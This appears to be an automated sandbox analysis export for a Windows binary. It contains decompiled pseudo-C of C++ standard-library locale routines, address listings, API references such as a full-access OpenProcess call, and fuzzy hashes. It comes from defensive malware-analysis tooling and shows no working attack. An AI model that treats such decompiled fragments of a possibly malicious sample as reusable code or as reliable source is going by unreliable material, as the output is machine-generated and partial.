                                                                                      0x00404185
                                                                                      0x0040418f
                                                                                      0x0040419c
                                                                                      0x0040419f
                                                                                      0x004041a3
                                                                                      0x004041ab
                                                                                      0x004041b1
                                                                                      0x004041bc
                                                                                      0x004041c9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404078
                                                                                      0x00404068
                                                                                      0x00403fee
                                                                                      0x00403fee
                                                                                      0x0040409a
                                                                                      0x004040a0
                                                                                      0x004040a3
                                                                                      0x004040b4
                                                                                      0x004040b7
                                                                                      0x004040ba
                                                                                      0x004040c7
                                                                                      0x004040d2
                                                                                      0x004040d5
                                                                                      0x004040e6
                                                                                      0x004040e9
                                                                                      0x004040ec
                                                                                      0x004040f6
                                                                                      0x004040fe
                                                                                      0x00404105
                                                                                      0x00404116
                                                                                      0x0040411e
                                                                                      0x0040412c
                                                                                      0x0040412c

                                                                                      APIs
                                                                                        • Part of subcall function 00407F70: std::locale::_Init.LIBCPMT ref: 00408002
                                                                                        • Part of subcall function 00407040: std::locale::_Init.LIBCPMT ref: 00407092
                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,9900EC21), ref: 00404041
                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00404105
                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004041B1
                                                                                        • Part of subcall function 00408400: std::_Lockit::_Lockit.LIBCPMT ref: 00408436
                                                                                        • Part of subcall function 00408400: std::_Lockit::_Lockit.LIBCPMT ref: 00408458
                                                                                        • Part of subcall function 00408400: std::_Lockit::~_Lockit.LIBCPMT ref: 00408478
                                                                                        • Part of subcall function 00408400: std::_Lockit::~_Lockit.LIBCPMT ref: 0040849F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lockitstd::_$InitIos_base_dtorLockit::_Lockit::~_std::ios_base::_std::locale::_$OpenProcess
                                                                                      • String ID: (C$X$|C
                                                                                      • API String ID: 2479089509-3218431619
                                                                                      • Opcode ID: 9c1ff46d8486a2c02733f9e6fe22006afb42a638439ae3bbc2b0ff37fe1da71c
                                                                                      • Instruction ID: 35d913283e045db799450650ff443e3f9a615b55ca256782a527e1e8516952c6
                                                                                      • Opcode Fuzzy Hash: 9c1ff46d8486a2c02733f9e6fe22006afb42a638439ae3bbc2b0ff37fe1da71c
                                                                                      • Instruction Fuzzy Hash: F8A13A74A002499FDB20DF64C949B9DBBF4FF08308F1485AEE509B7281D779AA85CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 68%
                                                                                      			E0040BBE0(void* __ebx, intOrPtr __edx, void* __edi, intOrPtr* _a4, intOrPtr _a8) {
                                                                                      				signed int _v8;
                                                                                      				char _v16;
                                                                                      				signed int _v20;
                                                                                      				char _v24;
                                                                                      				signed int _v28;
                                                                                      				char _v32;
                                                                                      				signed int _v36;
                                                                                      				short _v40;
                                                                                      				signed int _v44;
                                                                                      				short _v48;
                                                                                      				signed int _v52;
                                                                                      				char _v56;
                                                                                      				signed int _v60;
                                                                                      				char _v64;
                                                                                      				signed int _v68;
                                                                                      				char _v72;
                                                                                      				intOrPtr* _v76;
                                                                                      				intOrPtr _v80;
                                                                                      				char _v100;
                                                                                      				signed int _v116;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				signed int _t57;
                                                                                      				signed int _t68;
                                                                                      				intOrPtr _t87;
                                                                                      				intOrPtr* _t99;
                                                                                      				signed int* _t103;
                                                                                      				signed int _t106;
                                                                                      				intOrPtr _t108;
                                                                                      				void* _t109;
                                                                                      				signed int _t111;
                                                                                      				intOrPtr* _t114;
                                                                                      				intOrPtr _t117;
                                                                                      				intOrPtr* _t119;
                                                                                      				signed int* _t120;
                                                                                      				signed int _t122;
                                                                                      				signed int _t125;
                                                                                      				signed int _t129;
                                                                                      				void* _t130;
                                                                                      				void* _t132;
                                                                                      
                                                                                      				_t110 = __edx;
                                                                                      				_t125 = _t129;
                                                                                      				_push(0xffffffff);
                                                                                      				_push(0x4322c5);
                                                                                      				_push( *[fs:0x0]);
                                                                                      				_t130 = _t129 - 0x54;
                                                                                      				_push(__ebx);
                                                                                      				_push(__edi);
                                                                                      				_t57 =  *0x443048; // 0x9900ec21
                                                                                      				_push(_t57 ^ _t125);
                                                                                      				 *[fs:0x0] =  &_v16;
                                                                                      				_t114 = _a4;
                                                                                      				_t117 = _a8;
                                                                                      				_v20 = 0;
                                                                                      				if(_t114 == 0) {
                                                                                      					L21:
                                                                                      					 *[fs:0x0] = _v16;
                                                                                      					return 1;
                                                                                      				} else {
                                                                                      					_t138 =  *_t114;
                                                                                      					if( *_t114 != 0) {
                                                                                      						goto L21;
                                                                                      					} else {
                                                                                      						_t99 = E0041362C(__ebx, _t114, _t117, _t138, 0x10);
                                                                                      						_t132 = _t130 + 4;
                                                                                      						_v76 = _t99;
                                                                                      						_v8 = 0;
                                                                                      						_t119 = E00409760(_t99, _t117, _t114,  &_v100);
                                                                                      						_v20 = 1;
                                                                                      						if( *((intOrPtr*)(_t119 + 0x14)) >= 0x10) {
                                                                                      							_t119 =  *_t119;
                                                                                      						}
                                                                                      						_t103 =  &_v72;
                                                                                      						E0041247D(_t103, 0);
                                                                                      						_v8 = 2;
                                                                                      						_v68 = 0;
                                                                                      						_v64 = 0;
                                                                                      						_v60 = 0;
                                                                                      						_v56 = 0;
                                                                                      						_v52 = 0;
                                                                                      						_v48 = 0;
                                                                                      						_v44 = 0;
                                                                                      						_v40 = 0;
                                                                                      						_v36 = 0;
                                                                                      						_v32 = 0;
                                                                                      						_v28 = 0;
                                                                                      						_v24 = 0;
                                                                                      						_v8 = 8;
                                                                                      						_t140 = _t119;
                                                                                      						if(_t119 == 0) {
                                                                                      							E00412430("bad locale name");
                                                                                      							goto L23;
                                                                                      						} else {
                                                                                      							E00412760(_t103,  &_v72, _t119);
                                                                                      							 *(_t99 + 4) = 0;
                                                                                      							 *_t99 = 0x4345e8;
                                                                                      							 *((intOrPtr*)(_t99 + 8)) = E00412DDA(_t99, _t114, _t140);
                                                                                      							 *((intOrPtr*)(_t99 + 0xc)) = _t110;
                                                                                      							 *_t114 = _t99;
                                                                                      							_v20 = 1;
                                                                                      							_v8 = 0xa;
                                                                                      							E004127AB(_t103,  &_v72);
                                                                                      							_t80 = _v28;
                                                                                      							_t132 = _t132 + 0xc;
                                                                                      							if(_v28 != 0) {
                                                                                      								E0041AC1E(_t80);
                                                                                      								_t132 = _t132 + 4;
                                                                                      							}
                                                                                      							_t81 = _v36;
                                                                                      							_v28 = 0;
                                                                                      							if(_v36 != 0) {
                                                                                      								E0041AC1E(_t81);
                                                                                      								_t132 = _t132 + 4;
                                                                                      							}
                                                                                      							_t82 = _v44;
                                                                                      							_v36 = 0;
                                                                                      							if(_v44 != 0) {
                                                                                      								E0041AC1E(_t82);
                                                                                      								_t132 = _t132 + 4;
                                                                                      							}
                                                                                      							_t83 = _v52;
                                                                                      							_v44 = 0;
                                                                                      							if(_v52 != 0) {
                                                                                      								E0041AC1E(_t83);
                                                                                      								_t132 = _t132 + 4;
                                                                                      							}
                                                                                      							_t84 = _v60;
                                                                                      							_v52 = 0;
                                                                                      							if(_v60 != 0) {
                                                                                      								E0041AC1E(_t84);
                                                                                      								_t132 = _t132 + 4;
                                                                                      							}
                                                                                      							_t85 = _v68;
                                                                                      							_v60 = 0;
                                                                                      							if(_v68 != 0) {
                                                                                      								E0041AC1E(_t85);
                                                                                      								_t132 = _t132 + 4;
                                                                                      							}
                                                                                      							_v68 = 0;
                                                                                      							E004124D5( &_v72);
                                                                                      							_t108 = _v80;
                                                                                      							if(_t108 < 0x10) {
                                                                                      								goto L21;
                                                                                      							} else {
                                                                                      								_t112 = _v100;
                                                                                      								_t109 = _t108 + 1;
                                                                                      								_t87 = _v100;
                                                                                      								if(_t109 < 0x1000) {
                                                                                      									L20:
                                                                                      									_push(_t109);
                                                                                      									E004138AD(_t112);
                                                                                      									goto L21;
                                                                                      								} else {
                                                                                      									_t110 =  *((intOrPtr*)(_t87 - 4));
                                                                                      									_t103 = _t109 + 0x23;
                                                                                      									if(_t87 -  *((intOrPtr*)(_t87 - 4)) + 0xfffffffc > 0x1f) {
                                                                                      										L23:
                                                                                      										E0041805F(_t99, _t103, _t110);
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										_push(_t119);
                                                                                      										_t120 = _t103;
                                                                                      										_t68 =  *_t120;
                                                                                      										__eflags = _t68;
                                                                                      										if(_t68 == 0) {
                                                                                      											L29:
                                                                                      											return _t68;
                                                                                      										} else {
                                                                                      											_t106 = _t120[2] - _t68 & 0xfffffffc;
                                                                                      											__eflags = _t106 - 0x1000;
                                                                                      											if(_t106 < 0x1000) {
                                                                                      												L28:
                                                                                      												_push(_t106);
                                                                                      												_t68 = E004138AD(_t68);
                                                                                      												 *_t120 = 0;
                                                                                      												_t120[1] = 0;
                                                                                      												_t120[2] = 0;
                                                                                      												goto L29;
                                                                                      											} else {
                                                                                      												_t111 =  *(_t68 - 4);
                                                                                      												_t106 = _t106 + 0x23;
                                                                                      												__eflags = _t68 - _t111 + 0xfffffffc - 0x1f;
                                                                                      												if(_t68 - _t111 + 0xfffffffc > 0x1f) {
                                                                                      													E0041805F(_t99, _t106, _t111);
                                                                                      													asm("int3");
                                                                                      													asm("int3");
                                                                                      													asm("int3");
                                                                                      													asm("int3");
                                                                                      													asm("int3");
                                                                                      													asm("int3");
                                                                                      													asm("int3");
                                                                                      													asm("int3");
                                                                                      													asm("int3");
                                                                                      													asm("int3");
                                                                                      													asm("int3");
                                                                                      													asm("int3");
                                                                                      													asm("int3");
                                                                                      													asm("int3");
                                                                                      													asm("int3");
                                                                                      													asm("int3");
                                                                                      													_push(_t125);
                                                                                      													_push(_t120);
                                                                                      													_t122 = _t106;
                                                                                      													 *_t122 = 0x4345e8;
                                                                                      													E0041AC1E( *((intOrPtr*)(_t122 + 0xc)));
                                                                                      													 *_t122 = 0x4337e4;
                                                                                      													__eflags = _v116 & 0x00000001;
                                                                                      													if((_v116 & 0x00000001) != 0) {
                                                                                      														_push(0x10);
                                                                                      														E004138AD(_t122);
                                                                                      													}
                                                                                      													return _t122;
                                                                                      												} else {
                                                                                      													_t68 = _t111;
                                                                                      													goto L28;
                                                                                      												}
                                                                                      											}
                                                                                      										}
                                                                                      									} else {
                                                                                      										goto L20;
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      			}











































                                                                                      0x0040bbe0
                                                                                      0x0040bbe1
                                                                                      0x0040bbe3
                                                                                      0x0040bbe5
                                                                                      0x0040bbf0
                                                                                      0x0040bbf1
                                                                                      0x0040bbf4
                                                                                      0x0040bbf6
                                                                                      0x0040bbf7
                                                                                      0x0040bbfe
                                                                                      0x0040bc02
                                                                                      0x0040bc08
                                                                                      0x0040bc0b
                                                                                      0x0040bc0e
                                                                                      0x0040bc17
                                                                                      0x0040bdab
                                                                                      0x0040bdb3
                                                                                      0x0040bdc1
                                                                                      0x0040bc1d
                                                                                      0x0040bc1d
                                                                                      0x0040bc20
                                                                                      0x00000000
                                                                                      0x0040bc26
                                                                                      0x0040bc2d
                                                                                      0x0040bc2f
                                                                                      0x0040bc32
                                                                                      0x0040bc38
                                                                                      0x0040bc47
                                                                                      0x0040bc4d
                                                                                      0x0040bc54
                                                                                      0x0040bc56
                                                                                      0x0040bc56
                                                                                      0x0040bc5a
                                                                                      0x0040bc5d
                                                                                      0x0040bc62
                                                                                      0x0040bc69
                                                                                      0x0040bc70
                                                                                      0x0040bc74
                                                                                      0x0040bc7b
                                                                                      0x0040bc81
                                                                                      0x0040bc88
                                                                                      0x0040bc8c
                                                                                      0x0040bc8f
                                                                                      0x0040bc93
                                                                                      0x0040bc96
                                                                                      0x0040bc99
                                                                                      0x0040bc9c
                                                                                      0x0040bc9f
                                                                                      0x0040bca3
                                                                                      0x0040bca5
                                                                                      0x0040bdc7
                                                                                      0x00000000
                                                                                      0x0040bcab
                                                                                      0x0040bcb0
                                                                                      0x0040bcb5
                                                                                      0x0040bcbc
                                                                                      0x0040bcc7
                                                                                      0x0040bcca
                                                                                      0x0040bccd
                                                                                      0x0040bccf
                                                                                      0x0040bcd9
                                                                                      0x0040bce1
                                                                                      0x0040bce6
                                                                                      0x0040bce9
                                                                                      0x0040bcee
                                                                                      0x0040bcf1
                                                                                      0x0040bcf6
                                                                                      0x0040bcf6
                                                                                      0x0040bcf9
                                                                                      0x0040bcfc
                                                                                      0x0040bd05
                                                                                      0x0040bd08
                                                                                      0x0040bd0d
                                                                                      0x0040bd0d
                                                                                      0x0040bd10
                                                                                      0x0040bd13
                                                                                      0x0040bd1c
                                                                                      0x0040bd1f
                                                                                      0x0040bd24
                                                                                      0x0040bd24
                                                                                      0x0040bd27
                                                                                      0x0040bd2a
                                                                                      0x0040bd33
                                                                                      0x0040bd36
                                                                                      0x0040bd3b
                                                                                      0x0040bd3b
                                                                                      0x0040bd3e
                                                                                      0x0040bd41
                                                                                      0x0040bd4a
                                                                                      0x0040bd4d
                                                                                      0x0040bd52
                                                                                      0x0040bd52
                                                                                      0x0040bd55
                                                                                      0x0040bd58
                                                                                      0x0040bd61
                                                                                      0x0040bd64
                                                                                      0x0040bd69
                                                                                      0x0040bd69
                                                                                      0x0040bd6f
                                                                                      0x0040bd76
                                                                                      0x0040bd7b
                                                                                      0x0040bd81
                                                                                      0x00000000
                                                                                      0x0040bd83
                                                                                      0x0040bd83
                                                                                      0x0040bd86
                                                                                      0x0040bd87
                                                                                      0x0040bd8f
                                                                                      0x0040bda1
                                                                                      0x0040bda1
                                                                                      0x0040bda3
                                                                                      0x00000000
                                                                                      0x0040bd91
                                                                                      0x0040bd91
                                                                                      0x0040bd94
                                                                                      0x0040bd9f
                                                                                      0x0040bdcc
                                                                                      0x0040bdcc
                                                                                      0x0040bdd1
                                                                                      0x0040bdd2
                                                                                      0x0040bdd3
                                                                                      0x0040bdd4
                                                                                      0x0040bdd5
                                                                                      0x0040bdd6
                                                                                      0x0040bdd7
                                                                                      0x0040bdd8
                                                                                      0x0040bdd9
                                                                                      0x0040bdda
                                                                                      0x0040bddb
                                                                                      0x0040bddc
                                                                                      0x0040bddd
                                                                                      0x0040bdde
                                                                                      0x0040bddf
                                                                                      0x0040bde0
                                                                                      0x0040bde1
                                                                                      0x0040bde3
                                                                                      0x0040bde5
                                                                                      0x0040bde7
                                                                                      0x0040be29
                                                                                      0x0040be2a
                                                                                      0x0040bde9
                                                                                      0x0040bdee
                                                                                      0x0040bdf1
                                                                                      0x0040bdf7
                                                                                      0x0040be0b
                                                                                      0x0040be0b
                                                                                      0x0040be0d
                                                                                      0x0040be12
                                                                                      0x0040be1b
                                                                                      0x0040be22
                                                                                      0x00000000
                                                                                      0x0040bdf9
                                                                                      0x0040bdf9
                                                                                      0x0040bdfc
                                                                                      0x0040be04
                                                                                      0x0040be07
                                                                                      0x0040be2b
                                                                                      0x0040be30
                                                                                      0x0040be31
                                                                                      0x0040be32
                                                                                      0x0040be33
                                                                                      0x0040be34
                                                                                      0x0040be35
                                                                                      0x0040be36
                                                                                      0x0040be37
                                                                                      0x0040be38
                                                                                      0x0040be39
                                                                                      0x0040be3a
                                                                                      0x0040be3b
                                                                                      0x0040be3c
                                                                                      0x0040be3d
                                                                                      0x0040be3e
                                                                                      0x0040be3f
                                                                                      0x0040be40
                                                                                      0x0040be43
                                                                                      0x0040be44
                                                                                      0x0040be49
                                                                                      0x0040be4f
                                                                                      0x0040be57
                                                                                      0x0040be5d
                                                                                      0x0040be61
                                                                                      0x0040be63
                                                                                      0x0040be66
                                                                                      0x0040be6b
                                                                                      0x0040be72
                                                                                      0x0040be09
                                                                                      0x0040be09
                                                                                      0x00000000
                                                                                      0x0040be09
                                                                                      0x0040be07
                                                                                      0x0040bdf7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040bd9f
                                                                                      0x0040bd8f
                                                                                      0x0040bd81
                                                                                      0x0040bca5
                                                                                      0x0040bc20

                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040BC5D
                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BCB0
                                                                                      • __Getcoll.LIBCPMT ref: 0040BCC2
                                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040BCE1
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD76
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: std::_$Locinfo::_Lockit$GetcollLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                      • String ID: bad locale name
                                                                                      • API String ID: 1629477862-1405518554
                                                                                      • Opcode ID: 8247856538abf46324055f5f04f24619de889ec8328d91dea19d39314dfdd3d4
                                                                                      • Instruction ID: 97fe08cfb2a8f7b7a91d7429fb5f2b0e82c167ee0af6e40b762417834b2648ba
                                                                                      • Opcode Fuzzy Hash: 8247856538abf46324055f5f04f24619de889ec8328d91dea19d39314dfdd3d4
                                                                                      • Instruction Fuzzy Hash: C7618DB19012089BEB10DFA5D9497DEFBB4EF04314F14452EE905E7381E7BC9A84CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 70%
                                                                                      			E004035C0(void* __ebx, void* __edi, void* __esi) {
                                                                                      				intOrPtr _v8;
                                                                                      				char _v16;
                                                                                      				char _v24;
                                                                                      				intOrPtr* _v32;
                                                                                      				char _v52;
                                                                                      				char _v56;
                                                                                      				char _v60;
                                                                                      				char _v64;
                                                                                      				char _v68;
                                                                                      				short _v72;
                                                                                      				char _v76;
                                                                                      				short _v80;
                                                                                      				intOrPtr _v84;
                                                                                      				char _v88;
                                                                                      				char _v92;
                                                                                      				char _v96;
                                                                                      				char _v100;
                                                                                      				char _v104;
                                                                                      				signed char _v116;
                                                                                      				void* __ebp;
                                                                                      				signed int _t48;
                                                                                      				intOrPtr* _t52;
                                                                                      				void* _t79;
                                                                                      				intOrPtr _t84;
                                                                                      				intOrPtr* _t88;
                                                                                      				intOrPtr _t92;
                                                                                      				intOrPtr* _t93;
                                                                                      				signed int _t96;
                                                                                      				void* _t100;
                                                                                      				signed int _t103;
                                                                                      				void* _t104;
                                                                                      				void* _t107;
                                                                                      				void* _t110;
                                                                                      
                                                                                      				_push(__ebx);
                                                                                      				_t79 = _t100;
                                                                                      				_t103 = (_t100 - 0x00000008 & 0xfffffff8) + 4;
                                                                                      				_v8 =  *((intOrPtr*)(_t79 + 4));
                                                                                      				_t96 = _t103;
                                                                                      				_push(0xffffffff);
                                                                                      				_push(0x43153c);
                                                                                      				_push( *[fs:0x0]);
                                                                                      				_push(_t79);
                                                                                      				_t104 = _t103 - 0x50;
                                                                                      				_push(__esi);
                                                                                      				_push(__edi);
                                                                                      				_t48 =  *0x443048; // 0x9900ec21
                                                                                      				_push(_t48 ^ _t96);
                                                                                      				 *[fs:0x0] =  &_v24;
                                                                                      				_t88 =  *((intOrPtr*)(_t79 + 8));
                                                                                      				if(_t88 == 0) {
                                                                                      					L20:
                                                                                      					 *[fs:0x0] = _v24;
                                                                                      					return 2;
                                                                                      				} else {
                                                                                      					_t113 =  *_t88;
                                                                                      					if( *_t88 != 0) {
                                                                                      						goto L20;
                                                                                      					} else {
                                                                                      						_t52 = E0041362C(_t79, _t88, __esi, _t113, 0x18);
                                                                                      						_t107 = _t104 + 4;
                                                                                      						_v32 = _t52;
                                                                                      						_v16 = 0;
                                                                                      						_t84 =  *((intOrPtr*)( *((intOrPtr*)(_t79 + 0xc)) + 4));
                                                                                      						if(_t84 == 0) {
                                                                                      							_t92 = 0x43e90c;
                                                                                      						} else {
                                                                                      							_t92 =  *((intOrPtr*)(_t84 + 0x18));
                                                                                      							if(_t92 == 0) {
                                                                                      								_t10 = _t84 + 0x1c; // 0x1c
                                                                                      								_t92 = _t10;
                                                                                      							}
                                                                                      						}
                                                                                      						_t85 =  &_v104;
                                                                                      						E0041247D( &_v104, 0);
                                                                                      						_v100 = 0;
                                                                                      						_v96 = 0;
                                                                                      						_v92 = 0;
                                                                                      						_v88 = 0;
                                                                                      						_v84 = 0;
                                                                                      						_v80 = 0;
                                                                                      						_v76 = 0;
                                                                                      						_v72 = 0;
                                                                                      						_v68 = 0;
                                                                                      						_v64 = 0;
                                                                                      						_v60 = 0;
                                                                                      						_v56 = 0;
                                                                                      						_v16 = 7;
                                                                                      						_t116 = _t92;
                                                                                      						if(_t92 == 0) {
                                                                                      							E00412430("bad locale name");
                                                                                      							asm("int3");
                                                                                      							asm("int3");
                                                                                      							asm("int3");
                                                                                      							asm("int3");
                                                                                      							asm("int3");
                                                                                      							asm("int3");
                                                                                      							asm("int3");
                                                                                      							asm("int3");
                                                                                      							asm("int3");
                                                                                      							asm("int3");
                                                                                      							asm("int3");
                                                                                      							asm("int3");
                                                                                      							asm("int3");
                                                                                      							asm("int3");
                                                                                      							asm("int3");
                                                                                      							_push(_t96);
                                                                                      							return E00412AA5( &_v104, _v116 & 0x000000ff, _t85 + 8);
                                                                                      						} else {
                                                                                      							E00412760( &_v104,  &_v104, _t92);
                                                                                      							_t93 = _v32;
                                                                                      							 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                                      							 *_t93 = 0x4343e8;
                                                                                      							E00412A3A(_t88, _t93, _t116,  &_v52);
                                                                                      							asm("movups xmm0, [eax]");
                                                                                      							asm("movups [esi+0x8], xmm0");
                                                                                      							 *_t88 = _t93;
                                                                                      							_v16 = 8;
                                                                                      							E004127AB(_t85,  &_v104);
                                                                                      							_t65 = _v60;
                                                                                      							_t110 = _t107 + 0x10;
                                                                                      							if(_v60 != 0) {
                                                                                      								E0041AC1E(_t65);
                                                                                      								_t110 = _t110 + 4;
                                                                                      							}
                                                                                      							_t66 = _v68;
                                                                                      							_v60 = 0;
                                                                                      							if(_v68 != 0) {
                                                                                      								E0041AC1E(_t66);
                                                                                      								_t110 = _t110 + 4;
                                                                                      							}
                                                                                      							_t67 = _v76;
                                                                                      							_v68 = 0;
                                                                                      							if(_v76 != 0) {
                                                                                      								E0041AC1E(_t67);
                                                                                      								_t110 = _t110 + 4;
                                                                                      							}
                                                                                      							_t68 = _v84;
                                                                                      							_v76 = 0;
                                                                                      							if(_v84 != 0) {
                                                                                      								E0041AC1E(_t68);
                                                                                      								_t110 = _t110 + 4;
                                                                                      							}
                                                                                      							_t69 = _v92;
                                                                                      							_v84 = 0;
                                                                                      							if(_v92 != 0) {
                                                                                      								E0041AC1E(_t69);
                                                                                      								_t110 = _t110 + 4;
                                                                                      							}
                                                                                      							_t70 = _v100;
                                                                                      							_v92 = 0;
                                                                                      							if(_v100 != 0) {
                                                                                      								E0041AC1E(_t70);
                                                                                      							}
                                                                                      							_v100 = 0;
                                                                                      							E004124D5( &_v104);
                                                                                      							goto L20;
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      			}




































                                                                                      0x004035c0
                                                                                      0x004035c1
                                                                                      0x004035c9
                                                                                      0x004035d0
                                                                                      0x004035d4
                                                                                      0x004035d6
                                                                                      0x004035d8
                                                                                      0x004035e3
                                                                                      0x004035e4
                                                                                      0x004035e5
                                                                                      0x004035e8
                                                                                      0x004035e9
                                                                                      0x004035ea
                                                                                      0x004035f1
                                                                                      0x004035f5
                                                                                      0x004035fb
                                                                                      0x00403600
                                                                                      0x0040375e
                                                                                      0x00403766
                                                                                      0x00403776
                                                                                      0x00403606
                                                                                      0x00403606
                                                                                      0x00403609
                                                                                      0x00000000
                                                                                      0x0040360f
                                                                                      0x00403611
                                                                                      0x00403616
                                                                                      0x00403619
                                                                                      0x0040361f
                                                                                      0x00403626
                                                                                      0x0040362b
                                                                                      0x00403639
                                                                                      0x0040362d
                                                                                      0x0040362d
                                                                                      0x00403632
                                                                                      0x00403634
                                                                                      0x00403634
                                                                                      0x00403634
                                                                                      0x00403632
                                                                                      0x00403640
                                                                                      0x00403643
                                                                                      0x00403648
                                                                                      0x0040364f
                                                                                      0x00403653
                                                                                      0x0040365a
                                                                                      0x00403660
                                                                                      0x00403667
                                                                                      0x0040366b
                                                                                      0x0040366e
                                                                                      0x00403672
                                                                                      0x00403675
                                                                                      0x00403678
                                                                                      0x0040367b
                                                                                      0x0040367e
                                                                                      0x00403682
                                                                                      0x00403684
                                                                                      0x0040377c
                                                                                      0x00403781
                                                                                      0x00403782
                                                                                      0x00403783
                                                                                      0x00403784
                                                                                      0x00403785
                                                                                      0x00403786
                                                                                      0x00403787
                                                                                      0x00403788
                                                                                      0x00403789
                                                                                      0x0040378a
                                                                                      0x0040378b
                                                                                      0x0040378c
                                                                                      0x0040378d
                                                                                      0x0040378e
                                                                                      0x0040378f
                                                                                      0x00403790
                                                                                      0x004037a5
                                                                                      0x0040368a
                                                                                      0x0040368f
                                                                                      0x00403694
                                                                                      0x0040369b
                                                                                      0x004036a2
                                                                                      0x004036a8
                                                                                      0x004036b0
                                                                                      0x004036b3
                                                                                      0x004036b7
                                                                                      0x004036bc
                                                                                      0x004036c4
                                                                                      0x004036c9
                                                                                      0x004036cc
                                                                                      0x004036d1
                                                                                      0x004036d4
                                                                                      0x004036d9
                                                                                      0x004036d9
                                                                                      0x004036dc
                                                                                      0x004036df
                                                                                      0x004036e8
                                                                                      0x004036eb
                                                                                      0x004036f0
                                                                                      0x004036f0
                                                                                      0x004036f3
                                                                                      0x004036f6
                                                                                      0x004036ff
                                                                                      0x00403702
                                                                                      0x00403707
                                                                                      0x00403707
                                                                                      0x0040370a
                                                                                      0x0040370d
                                                                                      0x00403716
                                                                                      0x00403719
                                                                                      0x0040371e
                                                                                      0x0040371e
                                                                                      0x00403721
                                                                                      0x00403724
                                                                                      0x0040372d
                                                                                      0x00403730
                                                                                      0x00403735
                                                                                      0x00403735
                                                                                      0x00403738
                                                                                      0x0040373b
                                                                                      0x00403744
                                                                                      0x00403747
                                                                                      0x0040374c
                                                                                      0x00403752
                                                                                      0x00403759
                                                                                      0x00000000
                                                                                      0x00403759
                                                                                      0x00403684
                                                                                      0x00403609

                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00403643
                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040368F
                                                                                      • __Getctype.LIBCPMT ref: 004036A8
                                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 004036C4
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00403759
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                      • String ID: bad locale name
                                                                                      • API String ID: 1840309910-1405518554
                                                                                      • Opcode ID: bde8101792f5dc9e2ed1b757987341e2561887dd7e54417e55ab240f49b12b41
                                                                                      • Instruction ID: 254f5c476f8fbd2f3037df258afc1bf66e45135af037bcfa69ef326ad7ebc691
                                                                                      • Opcode Fuzzy Hash: bde8101792f5dc9e2ed1b757987341e2561887dd7e54417e55ab240f49b12b41
                                                                                      • Instruction Fuzzy Hash: E151BFF1D01248ABDB10DFA5D945BDEBBB8AF14304F14402AE805E7381E779AA58CB96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 53%
                                                                                      			E0040B260(void* __ebx, signed int* __ecx, void* __edx, void* __esi, void* __eflags) {
                                                                                      				signed int _v8;
                                                                                      				char _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				char _v28;
                                                                                      				char _v32;
                                                                                      				intOrPtr _v36;
                                                                                      				signed int _v40;
                                                                                      				signed int* _v44;
                                                                                      				signed int* _v48;
                                                                                      				void* __edi;
                                                                                      				signed int _t42;
                                                                                      				signed int _t43;
                                                                                      				signed int* _t46;
                                                                                      				signed int _t48;
                                                                                      				void* _t54;
                                                                                      				signed int _t55;
                                                                                      				signed int* _t56;
                                                                                      				void* _t61;
                                                                                      				signed int _t66;
                                                                                      				signed int _t67;
                                                                                      				intOrPtr _t69;
                                                                                      				signed int _t70;
                                                                                      				intOrPtr _t71;
                                                                                      				void* _t72;
                                                                                      				signed int* _t75;
                                                                                      				signed int _t82;
                                                                                      				void* _t86;
                                                                                      				void* _t87;
                                                                                      				signed int _t88;
                                                                                      				signed int* _t89;
                                                                                      				void* _t90;
                                                                                      				signed int* _t91;
                                                                                      				signed int _t95;
                                                                                      				void* _t96;
                                                                                      				signed int _t97;
